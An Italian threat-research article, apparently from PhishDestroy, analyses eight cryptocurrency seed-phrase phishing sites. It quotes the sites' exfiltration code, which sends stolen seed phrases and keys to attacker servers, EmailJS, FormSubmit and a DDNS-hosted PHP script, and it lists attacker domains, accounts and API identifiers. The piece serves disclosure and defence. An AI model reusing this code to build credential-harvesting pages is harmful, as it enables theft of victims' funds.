Torna alle notizie
Indagine approfondita

Anatomia del phishing nel mondo delle criptovalute:
8 attacchi reali analizzati in dettaglio

Abbiamo intercettato traffico di phishing in tempo reale, effettuato il reverse engineering su 5 programmi per il furto di frasi seed e rintracciato i dati rubati fino a bot di Telegram, account EmailJS e backend di servizi di phishing-as-a-service.

27 marzo 2026 Ricerca PhishDestroy 18 minuti di lettura
Analisi approfondita di un'indagine sul phishing nel settore delle criptovalute
L'analisi in tempo reale del traffico di phishing intercettato rivela l'intera infrastruttura di attacco
8Siti analizzati
7Metodi di esfiltrazione
1,824+Credenziali rubate
380+Marchi di portafogli
$0Costo dell'attaccante

Cosa abbiamo scoperto

Ogni giorno, migliaia di utenti di criptovalute perdono i propri fondi a causa di siti di phishing che sembrano indistinguibili dai servizi di portafoglio legittimi. Ma cosa succede dietro Il falso pulsante “Connect Wallet”? Dove finisce effettivamente la tua frase di seed?

Abbiamo intercettato il traffico HTTP in tempo reale proveniente da 5 siti di phishing attivi, scaricato il loro codice sorgente completo e rintracciato ogni endpoint di esfiltrazione dei dati fino alla sua destinazione finale. Questa indagine svela l'anatomia completa del moderno crypto-phishing: dai trucchi di ingegneria sociale che inducono l'utente a digitare la propria frase seed, al bot di Telegram che la invia all'autore dell'attacco in tempo reale.

Dichiarazione di non responsabilità

Tutte le frasi di seed riportate in questo articolo sono dati di prova generati in modo casuale. Nessuna credenziale reale è stata compromessa nel corso di questa indagine. Tutti i siti sono stati segnalati ai rispettivi provider di hosting e ai reparti preposti alla gestione degli abusi.

Il modello di attacco universale

Nonostante abbiano nomi diversi e sistemi di gestione diversi, tutti e 8 i siti di phishing seguono lo stesso esattamente lo stesso percorso psicologico:

Pagina di destinazioneCreazione di fiducia
Selezione portafogli60–110+ loghi
Falso messaggio "Connessione in corso..."Timer da 3–5 secondi
"Connessione non riuscita"Fallisce sempre
Inserimento manualeSeed / Chiave / Keystore
EsfiltrazioneTG / E-mail / API

L'osservazione fondamentale: l'animazione "Connessione in corso..." è sempre programmato per fallire. Nel codice sorgente del sito n. 4 abbiamo trovato const success = false — non viene effettuato alcun tentativo di connessione al portafoglio. L'intero flusso serve esclusivamente a indirizzare le vittime verso il modulo “Connetti manualmente”.

Catena di attacco di phishing crittografico in sei fasi
La catena di attacco universale in 6 fasi comune a tutti i siti di phishing che abbiamo analizzato

Gli 8 siti: analisi dettagliata

1
Protocollo del livello di rete
networklayers.pages.dev
In direttaCloudflare PagesBot di Telegram + EmailJS

Soprosto

Un "protocollo decentralizzato" fittizio per la convalida dei wallet. Utilizza i ticker dei prezzi in tempo reale di CryptoCompare e link a veri blockchain explorer (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) per garantire credibilità. La pagina di destinazione presenta oltre 100 loghi di wallet e un processo di “convalida” in 3 fasi.

La doppia catena di esfiltrazione

Il backend più sofisticato tra tutti e cinque: ogni credenziale rubata viene inviata tramite due canali indipendenti contemporaneamente:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Risultati dell'analisi OSINT

IndicatoreValore
Email truffaldinaBestgrace309@gmail.com
Bot di Telegram@DewdropsTG_bot (ID: 7567323692)
Destinatario di Telegram@metatech2 (ID chat: 7350941887)
Backendemailjs-backend-ovtg.onrender.com
Servizio EmailJSservice_d5qigxs / template_7bqxeaa
Dominio nascostolayerschain.in (da un'e-mail CF con testo offuscato)
Messaggi inviati1.824+ (da Telegram, ID messaggio)
Età del dominio2 giorni (TLS: 25 marzo 2026)
Violazione delle norme di sicurezza operativa (OPSEC)

L'indirizzo e-mail dell'autore dell'attacco è stato trovato in un Commento JavaScript all'interno config.js: // Bestgrace309@gmail.com. Si sono dimenticati di rimuoverlo prima della distribuzione. Inoltre, il backend del relay di Telegram è completamente aperto: nessuna autenticazione, nessuna limitazione di velocità. Decodificando i dati di Cloudflare data-cfemail Oltre all'offuscamento nel codice HTML, abbiamo anche scoperto un indirizzo e-mail nascosto: support@layerschain.in, collegandosi alle infrastrutture di hosting indiane e sudafricane.

2
Migrazione del token AQLA
token-aqla.pages.dev
In direttaCloudflare PagesModuli non statici

Soprosto

Una riproduzione fedelissima della realtà Aqualibre (AQLA) pagina dedicata alla migrazione dei token. Il codice HTML contiene un tag di metadati che ne rivela la fonte: data-scrapbook-source="https://token.aqla.app/migration", con data del 19 novembre 2024.

L'approccio "zero-code"

Questo aggressore richiede nessun codice lato server. Il modulo invia i dati direttamente a Non statico — un backend per moduli legittimo per siti statici. Ogni invio viene inoltrato all'indirizzo e-mail del truffatore. L'indirizzo e-mail dell'autore dell'attacco è non è mai visibile nel codice sorgente.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Costo: 0 $

Cloudflare Pages: gratuito. Moduli non statici: gratuiti. Nessun dominio acquistato. Nessun server noleggiato. Costo totale dell'infrastruttura: zero dollari.

3
SafePal Typosquat
antiresolve-mysafpalnode.pages.dev
In diretta Cloudflare Pages Moduli non statici

Soprosto

Il sottodominio contiene "safpal" — un errore ortografico intenzionale di SafePal, un popolare portafoglio hardware. Il sito si presenta come "Blockchain Wallet Rectification" con 26 categorie di argomenti fasulle. Utilizza Typed.js per animare i nomi delle blockchain (Ethereum, BSC, Polygon...) e un ticker LiveCoinWatch per dare un'impressione di credibilità.

Stesso kit, stesso operatore?

Utilizza il lo stesso identico modello di phishing come sito n. 2: identico connect.html, identico wallets.html con oltre 60 loghi, lo stesso backend Un-static (ID del modulo diverso — 6f1b82c3...da9943af). Il fatto che il kit sia identico fa fortemente supporre che un unico operatore che gestisce entrambi i siti.

Errori evidenti nel codice: "Privay Policy" (manca la "c"), "seperated" (dovrebbe essere "separated"), "Kestore" (manca la "y"). Il campo password utilizza type="text" anziché type="password".

4
Clone di Flare Network
flaremainnet.pages.dev
In direttaCloudflare PagesEmailJS doppio (ridondanza)

Soprosto

Un clone quasi perfetto del Flare Network portale — una vera e propria blockchain EVM di livello 1 con i protocolli FTSO e Data Connector. Riproduce oltre 30 partner dell'ecosistema, la navigazione e l'immagine del marchio. Favicon caricate da un sito typosquat: portal.flaremainet.com (manca una "n" in "mainnet").

Doppia ridondanza di EmailJS

L'unico sito che utilizza due account EmailJS distinti contemporaneamente per garantire la ridondanza contro le rimozioni:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Oggetto dell'e-mail per ogni furto: "New Wallet Details from Flare".

Si tratta di un'attività finanziata

Il codice HTML contiene Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Protezione PPC di Lunio, e un Pixel pubblicitario di Twitter/X. L'autore dell'attacco sta eseguendo pubblicità a pagamento per indirizzare le vittime verso il sito di phishing e filtrare i clic generati dai bot. Non si tratta di un hobby: è un'operazione finanziata, con analisi dei dati e investimenti pubblicitari.

Sito di phishing della rete Flare che utilizza sia EmailJS sia pubblicità a pagamento
Sito n. 4: annunci a pagamento, monitoraggio analitico e doppia esfiltrazione — l’operazione più professionale
5
COIN NODE / Correzione del portafoglio (PhaaS)
swiftauthapps.pages.dev
Backend non funzionanteAPI PulseResolve (PhaaS)

Soprosto

Un servizio generico denominato "COIN NODE" / "Wallet Fix" (senza marchio specifico). Copyright "Wallet Fix 2022" — questo modello di kit risale ad almeno 4 anni fa. Immagini ospitate su pumpeth.com (WordPress su AWS).

Phishing-as-a-Service

L'architettura backend più preoccupante: una API multi-tenant basata su UUID:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

A ogni truffatore viene assegnato un endpoint UUID dedicato. Un operatore centrale gestisce l'API, monitora le campagne e, potenzialmente, trattiene una percentuale dei fondi sottratti. Questo è furti di criptovalute su larga scala — un modello di “phishing-as-a-service”.

Infrastrutture correlate (per lo più inattive)

DominioRuoloStato
api.pulseresolve.comAPI di esfiltrazioneNXDOMAIN
walletissuesfix.netHost della faviconNXDOMAIN
syncwallet.onlineLogo hostNXDOMAIN
pumpeth.comCDN per immaginiIn tempo reale (AWS)
Zombie Frontend

Il backend non funziona più, ma il Il frontend è ancora attivo su Cloudflare Pages. Se l'autore dell'attacco effettua una nuova registrazione pulseresolve.com, il sito torna immediatamente operativo.

6
Centro assistenza + Recupero del registro
wallet-support-39n.pages.dev e ledger-recovery.support
In direttaCloudflare Pages + ReplitAPI C2 personalizzataCompletamento automatico BIP39

Soprosto

A operazione su due fronti: un "Centro assistenza" generico all'indirizzo wallet-support-39n.pages.dev con 15 categorie di banconote false e 39 marche di portafogli, oltre a un Clone della procedura di registrazione su Ledger con riproduzione perfetta al pixel alle ledger-recovery.support ospitato su Replit — completo di selezione del modello del dispositivo, configurazione del PIN e una griglia con la frase seed di 24 parole con autocompletamento BIP39 reale.

Backend C2 anti-scanner

La pagina di assistenza del portafoglio invia i dati rubati a api.uranustoken.org/log — un C2 personalizzato basato su nginx/Ubuntu dietro Cloudflare. Il backend elimina intenzionalmente tutte le richieste GET (restituisce un errore 522 per timeout), rispondendo solo alle richieste POST. Ciò significa che gli scanner di URL, i crawler di Google Safe Browsing e i ricercatori di sicurezza che inviano richieste GET all'endpoint non rilevano nulla: il C2 sembra inattivo.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Il clone di Ledger esegue un backend Express.js separato direttamente su Replit: POST /api/recovery-phrase raccolta {deviceId, pin, phrase}. Restituisce 400 {"error":"Invalid data provided"} in caso di input non valido — a conferma che il backend è in tempo reale e con verifica attiva dati rubati.

Risultati dell'analisi OSINT

IndicatoreValore
Frontend (portafoglio)wallet-support-39n.pages.dev
Frontend (Ledger)ledger-recovery.support (34.111.179.208)
Backend C2 api.uranustoken.org → nginx/1.24.0 Ubuntu
Indirizzi IP C2104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
SegreteriaName.com (ledger-recovery.support)
Implementato9 gennaio 2026 (intestazione "Last-Modified")
Stack tecnologico React + Vite + Tailwind v4.1 + Framer Motion
Massima fedeltà dell'esperienza utente

Il pacchetto JS da 466 KB contiene il elenco completo delle parole BIP39 per il completamento automatico in tempo reale, 67 riferimenti a "passphrase" e 39 a "mnemonic". Il clone di Ledger guida le vittime attraverso lo stesso identico flusso di registrazione di un vero dispositivo Ledger: la pagina di phishing più convincente di tutta questa indagine. Il apiKey Il campo nella configurazione suggerisce un Architettura PhaaS multi-tenant.

7
Launchpad decentralizzato
mainnetvalidationapp.pages.dev
In direttaCloudflare PagesFormSubmit.co

Soprosto

Una piattaforma generica di "lancio decentralizzato" con 21 categorie di esche (Staking, migrazione, KYC, omaggi, riscossione dei premi, recupero degli asset, prevendita, conio di NFT, account bloccati...) e Oltre 70 marchi di portafogli — una delle liste di portafogli più complete che abbiamo trovato. L’errore ortografico rivelatore “Sychronize” (manca la “n”) ne smaschera la falsità.

La pipeline FormSubmit

Usi FormSubmit.co — un servizio legittimo di invio di moduli via e-mail. L'hash dell'endpoint a2cf4131f1a5d39453c7c183df96f86f è l'MD5 dell'indirizzo e-mail del truffatore. Abbiamo effettuato attacchi di forza bruta su centinaia di modelli di indirizzi e-mail su Gmail, Yahoo, Hotmail, ProtonMail, Yandex e Mail.ru — nessuna corrispondenza. Il truffatore utilizza un indirizzo e-mail poco comune o generato casualmente.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Risultati dell'analisi OSINT

IndicatoreValore
Dominiomainnetvalidationapp.pages.dev
Hash di FormSubmita2cf4131f1a5d39453c7c183df96f86f
ID campagnaDAPP DECENTRALIZZATO
Kit FontAwesomebdc3291137 (kit n. 112310842, versione gratuita v6.7.2)
jQuery3.2.1 + 3.5.1 caricati contemporaneamente
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (incompatibilità)
Due maniglie di trascinamento

Kit FontAwesome bdc3291137 — FontAwesome è in grado di identificare il titolare dell'account associato a questo ID kit. Il tag della campagna DAPP DECENTRALIZED potrebbe comparire su altri siti di phishing che utilizzano lo stesso hash di FormSubmit. Dopo aver rubato la frase di seed, un codice QR falso e codice di riferimento casuale di 7 caratteri viene visualizzato il messaggio: "Contatta l'amministratore indicando il tuo codice di riferimento univoco" — lasciando le vittime in attesa invece di avviare un'indagine.

8
R2 Bucket + PHP sul computer di casa
pub-519769e9eb634616b1746c2018641d56.r2.dev
MortoCloudflare R2PHP + DDNS

Soprosto

Sconosciuto — sia il frontend che il backend sono offline. In base alla struttura del payload, si trattava di un programma per il furto della frase seed di un portafoglio crittografico. Il Bucket pubblico di Cloudflare R2 (archiviazione a oggetti, non Pages) è un vettore di phishing ben documentato con oltre 5.000 pagine dannose individuate e un aumento del traffico di 61 volte segnalato da Netskope.

La configurazione dello “script kiddie”

Il più operazione primitiva in questa raccolta. Le frasi seme vengono inviate parola per parola a uno script PHP in esecuzione su un computer di casa o su un VPS collegato a un servizio DNS dinamico gratuito:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Risultati dell'analisi OSINT

IndicatoreValore
Frontend pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE]
Backend mercifuljigga4real123.publicvm.com [NXDOMAIN]
ID del secchio R2519769e9eb634616b1746c2018641d56
Provider DDNS DNSExit.com / Netdorm, Inc. (Cincinnati, Ohio)
DNS NSns10–13.dnsexit.com
Nome utentemercifuljigga4real123
Nome utente OSINT: mercifuljigga4real123

"Merciful" + "jigga" (il soprannome di Jay-Z) + "4real" + "123" — un nickname decisamente personale che suggerisce un'affinità con la cultura hip-hop. Non trovato su qualsiasi piattaforma indicizzata: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch o Steam. Probabilmente attivo su Discord, Telegram o piattaforme di gioco con questo nome o varianti simili. Il nome del file fuc.php si abbina perfettamente allo stile irriverente del manico.

7 modi per rubarti la frase di seed

Confronto tra quattro metodi di esfiltrazione dei dati tramite phishing nel settore delle criptovalute
Sette diverse architetture di esfiltrazione utilizzate negli 8 siti di phishing
MetodoSitiCome funzionaVelocitàCosto
Bot di Telegram#1 Express.js su Render.com funge da proxy per l'API di Bot. Il truffatore riceve immediatamente un messaggio diretto con le credenziali. In tempo reale$0
EmailJS#1, #4 Il JavaScript lato client invia i dati direttamente all’API di EmailJS, che a sua volta li inoltra all’indirizzo e-mail del truffatore. ~1 min$0
Moduli non statici#2, #3 Modulo HTML standard con metodo POST indirizzato a un servizio di gestione moduli legittimo che inoltra i dati inviati tramite e-mail. ~1 min$0
FormSubmit.co#7 jQuery AJAX a FormSubmit.co. Indirizzo e-mail nascosto dietro un hash MD5. Campagna contrassegnata con il tag "DAPP DECENTRALIZED". ~1 min$0
API C2 personalizzata#6 L'applicazione React SPA invia le richieste all'API nginx/Express tramite Cloudflare. Elimina le richieste GET (522) per eludere gli scanner. Risponde solo ai comandi POST. In tempo realecirca 5 $ al mese
PHP + DDNS#8 Script PHP su un computer di casa tramite un servizio DNS dinamico gratuito (publicvm.com). Frase di seed inviata parola per parola. In tempo reale$0
API PhaaS#5 API multi-tenant basata su UUID. Un operatore centrale gestisce il backend, mentre i truffatori affittano gli endpoint. In tempo realeSconosciuto

7 segnali di allarme che smascherano ogni sito di phishing

Se vedi qualsiasi In questi casi, chiudi immediatamente la scheda:

1. Il messaggio "Connessione fallita" è sempre falso

Le connessioni reali al portafoglio utilizzano il protocollo WalletConnect o le estensioni del browser. Non visualizzano mai un errore del tipo "Connessione fallita" che richiede di digitare la frase di seed.

2. Da 50 a 110+ loghi di portafogli, un'unica destinazione

Ogni icona del portafoglio rimanda allo stesso modulo. Un servizio vero e proprio integrerebbe l'SDK specifico di ciascun portafoglio.

3. "Errore" dopo l'invio

Il falso "Errore 503" o "Errore sconosciuto" che compare dopo l'invio è intenzionale. I tuoi dati sono già stati rubati: l'errore ti induce a riprovare con un altro portafoglio.

4. Ospitato su .pages.dev

Tutti e 5 i siti abusano del piano gratuito di Cloudflare Pages. Non è richiesta alcuna verifica dell'identità. Nel 2025 gli abusi legati al phishing su Cloudflare Pages sono aumentati del 198%.

5. Tre schede: Frase / Chiave privata / Archivio chiavi

Nessun servizio legittimo richiede tutti e tre i tipi di credenziali. Questo modulo a tre schede è una caratteristica tipica dei kit di phishing.

6. Nessuna interazione con la blockchain

Nessuno di questi siti si carica ethers.js, web3.js, né effettuano chiamate RPC. Sono semplici moduli HTML che fingono di essere dApp.

7. Infrastruttura a costo zero

Hosting gratuito + servizi di moduli gratuiti + messaggistica gratuita = un'operazione di phishing completa a costo zero. Se il sito non ha un dominio vero e proprio, diffidate.

Tabella completa dell'IOC

Per i team di sicurezza, le piattaforme di intelligence sulle minacce e chi segnala abusi:

Domini e infrastruttura

DominioTipoStato
networklayers.pages.devInterfaccia di phishingIn diretta
token-aqla.pages.devInterfaccia di phishingIn diretta
antiresolve-mysafpalnode.pages.devInterfaccia di phishingIn diretta
flaremainnet.pages.devInterfaccia di phishingIn diretta
swiftauthapps.pages.devInterfaccia di phishingIn diretta
emailjs-backend-ovtg.onrender.comBackend del relè TGIn diretta
portal.flaremainet.comRisorse relative al typosquattingSconosciuto
layerschain.inDominio correlatoDNS non funzionante
api.pulseresolve.comBackend PhaaSNXDOMAIN
walletissuesfix.netHost delle risorseNXDOMAIN
syncwallet.onlineLogo hostNXDOMAIN
pumpeth.comCDN per immaginiIn tempo reale (AWS)
wallet-support-39n.pages.devInterfaccia di phishingIn diretta
ledger-recovery.supportPhishing su Ledger (Replit)In diretta
api.uranustoken.orgBackend C2 (nginx/Ubuntu)In diretta
uranustoken.orgDominio principale404
mainnetvalidationapp.pages.devInterfaccia di phishingIn diretta
pub-519769e9eb634616b1746c2018641d56.r2.devPhishing (categoria R2)Non connesso
mercifuljigga4real123.publicvm.comBackend PHP (DDNS)NXDOMAIN

Account e identificativi

TipoValoreSito
E-mailBestgrace309@gmail.com#1
E-mail (nascosta)support@layerschain.in#1
Bot di Telegram@DewdropsTG_bot (7567323692)#1
Utente di Telegram@metatech2 (7350941887)#1
EmailJS n. 1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS n. 2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS n. 3service_isy47de / JsVEgXVcaSTro1etu#4
Modulo non staticoc78173e2d991...94c3f76#2
Modulo non statico6f1b82c3ce55...da9943af#3
UUID PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Istanza di renderingrndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 di FormSubmita2cf4131f1a5d39453c7c183df96f86f#7
Tag della campagnaDAPP DECENTRALIZZATO#7
Kit FontAwesomebdc3291137 (kit n. 112310842)#7
ID del secchio R2519769e9eb634616b1746c2018641d56#8
Nome utente/DDNSmercifuljigga4real123#8

Dove segnalare i tentativi di phishing legati alle criptovalute

Dove segnalare i siti di phishing legati alle criptovalute — rimozioni su più fronti
Agire contemporaneamente su hosting, servizi di backend e piattaforme di messaggistica per garantire la massima rapidità di rimozione
ServizioCosa segnalareCome
Cloudflare7 bucket .pages.dev + 1 bucket R2abuse.cloudflare.com
Google Safe BrowsingTutti gli URL di phishingSegnala un tentativo di phishing
PhishTankTutti gli URL della lista nera della communityphishtank.org
EmailJS3 account oggetto di abuso (ID di servizio sopra indicati)abuse@emailjs.com
Non statico2 endpoint di formaContattaci tramite un-static.com
Render.comBackend di inoltro di TelegramModulo per segnalare abusi
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google (Gmail)Bestgrace309@gmail.comSegnalazione di abuso a Google
Twitter/XAccount pubblicitario per la promozione del sito n. 4Segnala abuso relativo agli annunci X
FormSubmit.coHash a2cf4131... (#7)Modulo di segnalazione di abusi FormSubmit
Replitledger-recovery.support (#6)Segnalazione di abuso su Replit
Name.comResponsabile del registro per ledger-recovery.supportAbusi su Name.com
DNSExitmercifuljigga4real123.publicvm.comAbusi su dnsexit.com
FontAwesomeKit bdc3291137 (n. 7)Uso improprio di FontAwesome
ChainabuseTutte le campagne di phishingChainabuse.com

Come proteggersi

La regola d'oro

Nessun servizio affidabile ti chiederà mai di digitare la tua frase di seed su un sito web. Le frasi di seed vanno inserite esclusivamente nel software ufficiale del portafoglio durante la procedura di ripristino del portafoglio — mai su siti web di terze parti dedicati alla "convalida", alla "sincronizzazione" o al "ripristino".

Prima di collegare qualsiasi portafoglio:

  • Verifica che l'URL corrisponda al dominio ufficiale. Controlla i dettagli del certificato SSL.
  • Real WalletConnect utilizza un codice QR o un deep link — mai un modulo con la frase seed.
  • Se la "connessione non va a buon fine" e ti viene chiesto di inserire manualmente le credenziali, si tratta di phishing.
  • Verifica gli URL sospetti su PhishTank oppure VirusTotal prima di interagire.
  • Utilizza un portafoglio hardware: richiede una conferma fisica per ogni transazione.
  • Aggiungi agli preferiti gli URL ufficiali. Non cliccare mai sui link presenti negli annunci, nei messaggi diretti o sui social media.

La tassonomia del crypto-phishing

I ladri di frasi seed rappresentano solo una delle categorie. Ecco il quadro completo del phishing nel mondo delle criptovalute: aggiungeremo approfondimenti su ciascuna tipologia.

Programmi per il furto delle frasi di seed
Pagine false di “Connect Wallet” che ti inducono con l’inganno a digitare la tua frase di recupero. Il tema centrale di questo articolo: 5 esempi reali analizzati nel dettaglio.
Trattato in precedenza
Dirottamento dell'approvazione
dApp dannose che richiedono autorizzazioni illimitate per i token tramite MetaMask. Una volta ottenuta l'autorizzazione, l'autore dell'attacco svuota il tuo portafoglio senza bisogno della tua frase di seed.
Prossimamente
Ice Phishing (Permit2)
Sfrutta le autorizzazioni senza consumo di gas previste dall’EIP-2612. La vittima firma un messaggio off-chain che concede i diritti di trasferimento dei token — nessuna approvazione on-chain è visibile fino al momento del prelievo.
Prossimamente
Affermazioni false sugli airdrop
Airdrop di token falsi che richiedono la "richiesta" tramite uno smart contract dannoso. La transazione di richiesta, in realtà, trasferisce all'esterno i tuoi token reali.
Prossimamente
Programmi che dirottano gli appunti
Malware che monitora gli appunti e sostituisce silenziosamente gli indirizzi dei portafogli copiati con l'indirizzo dell'autore dell'attacco prima che tu li incolli.
Prossimamente
Polvere + Avvelenamento
Le transazioni di importo irrisorio provenienti da indirizzi simili intasano la cronologia. La vittima copia l'indirizzo falso dalla cronologia delle transazioni per il suo prossimo trasferimento.
Prossimamente

La scomoda verità

I costi per l'organizzazione di un'operazione di phishing nel settore delle criptovalute $0 e richiede meno di 30 minuti. Hosting gratuito, servizi di moduli gratuiti, bot di messaggistica gratuiti. L'autore dell'attacco a Sito n. 1 ha già raccolto le credenziali da Oltre 1.824 vittime. Il sito n. 4 è in funzione pubblicità a pagamento su larga scala. Non si tratta di dilettantismo: è un vero e proprio settore. L'unica difesa è la consapevolezza.

Aiutaci a reagire

PhishDestroy monitora e segnala in tempo reale i siti di phishing legati alle criptovalute. Se ti sei imbattuto in un sito sospetto, segnalacelo: lo esamineremo e faremo il possibile per farlo rimuovere.

Indagini correlate

Indagine
La fine di xmrwallet.com: NameSilo ha mentito per proteggere un ladro di M
Furto di Monero durato 10 anni. Sono intervenuti 3 registrar. NameSilo ha inventato 7 bugie.
Approfondimento
Reti di "crypto drainer": l'infrastruttura smascherata
In che modo le attività di “drainer-as-a-service” condividono infrastrutture e operatori.
Pannello a vista
Pannello di phishing di Trust Wallet: accesso amministrativo completo
Siamo riusciti ad accedere al pannello di amministrazione di un'operazione di phishing relativa a Trust Wallet.
Infrastrutture
Infrastruttura fraudolenta smascherata: backend condivisi
In che modo le operazioni fraudolente condividono server, modelli e flussi di pagamento.

Condividi questa indagine

X / Twitter Telegram Reddit LinkedIn

Indagini correlate

Panel sul phishing di Trust Wallet: 239.000 dollari rubati, 6 operatori
INDAGINE APPROFONDITA
Panel sul phishing di Trust Wallet: 239.000 dollari rubati, 6 operatori
Crypto Drainer Toolkit: smascherati i rivenditori di Angel Drainer
INDAGINE APPROFONDITA
Crypto Drainer Toolkit: smascherati i rivenditori di Angel Drainer
Truffatori smascherati: analisi approfondita di 4 sistemi di gestione delle truffe
INDAGINE
Truffatori smascherati: analisi approfondita di 4 sistemi di gestione delle truffe